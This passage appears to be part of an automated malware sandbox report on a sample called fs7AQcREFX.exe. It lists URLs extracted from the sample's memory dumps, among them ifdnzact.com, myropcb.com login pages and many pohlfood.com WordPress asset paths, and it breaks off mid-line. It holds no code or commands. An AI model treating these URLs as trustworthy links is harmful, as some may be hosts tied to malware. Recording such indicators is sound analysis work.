                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.615310015.0000000004020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407669143.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.409783976.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ifdnzact.com/?dn=x0c.com&pid=9PO755G95
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630741825.0000000000D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                      Source: fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lik.quadlock.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.522264037.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403612159.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mobilnic.net/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/login/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/register/
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pcgrate.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.13.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.13.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.js?ve
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.13.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js?
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.13
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.13.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.13.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.13.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.13.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.13.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.13.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 